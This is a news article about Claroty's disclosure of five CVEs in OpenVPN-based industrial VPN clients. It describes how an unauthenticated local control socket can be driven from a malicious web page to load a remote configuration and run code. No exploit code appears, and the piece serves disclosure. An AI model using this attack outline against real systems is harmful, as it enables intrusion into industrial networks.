Serious Vulnerabilities Threaten OpenVPN-Based Applications

By Ava McKinneyOnline Safety

Serious Vulnerabilities Threaten OpenVPN-Based Applications

Claroty has issued a warning that products built on OpenVPN are at risk due to five serious vulnerabilities that could allow arbitrary code execution if a victim visits a malicious web page. These bugs affect solutions from companies such as HMS Industrial Networks, MB connect line, PerFact, and Siemens.

How the Vulnerabilities Work

Researchers found that manufacturers typically deploy OpenVPN as a service with SYSTEM privileges, which creates security risks. Any remote or local application can potentially control OpenVPN to initiate or terminate secure connections.

Generally, the VPN client-server architecture includes:

  • An external interface (a GUI application for the user)
  • A backend server (which receives commands from the external interface)
  • OpenVPN (a service managed by the backend, responsible for VPN connections)

In most cases, the dedicated socket channel used by the interface to control the backend uses a cleartext protocol without any authentication. According to experts, “anyone with access to the local TCP port listened to by the backend can potentially upload an OpenVPN configuration and force the backend to create a new OpenVPN instance with that configuration.”

Attack Scenario

Essentially, an attacker only needs to trick the victim into visiting a malicious website with JavaScript designed to locally send a blind POST request (to transmit commands to the VPN client’s backend). The company notes that this is a classic example of an SSRF (Server-Side Request Forgery) vulnerability.

“As soon as the victim clicks the link, an HTTP POST request is launched locally on the dedicated TCP port. Since HTTP is a cleartext protocol, with each line ending in \n, the backend server will read and ignore all lines until it reaches the required command,” the report states.

Because the backend server automatically parses and executes any valid commands it receives, it can be instructed to load a remote configuration file containing specific commands that lead to code execution or payload installation.

Limitations and Requirements

Fortunately, for remote code execution, the hacker needs access to a controlled SMB server. This means the attacker must be on the same domain network as the target system, or the victim’s computer must allow SMB access to external servers.

Vulnerabilities Identified

Following Claroty’s research, five vulnerabilities were assigned identifiers:

  • CVE-2020-14498 (CVSS score: 9.6, eCatcher HMS Industrial Networks AB)
  • CVE-2021-27406 (CVSS score: 8.8, OpenVPN client PerFact)
  • CVE-2021-31338 (CVSS score: 7.8, Siemens SINEMA RC client)
  • CVE-2021-33526 and CVE-2021-33527 (CVSS score: 7.8, MB connect line GmbH mbConnect Dialup)

Leave a Reply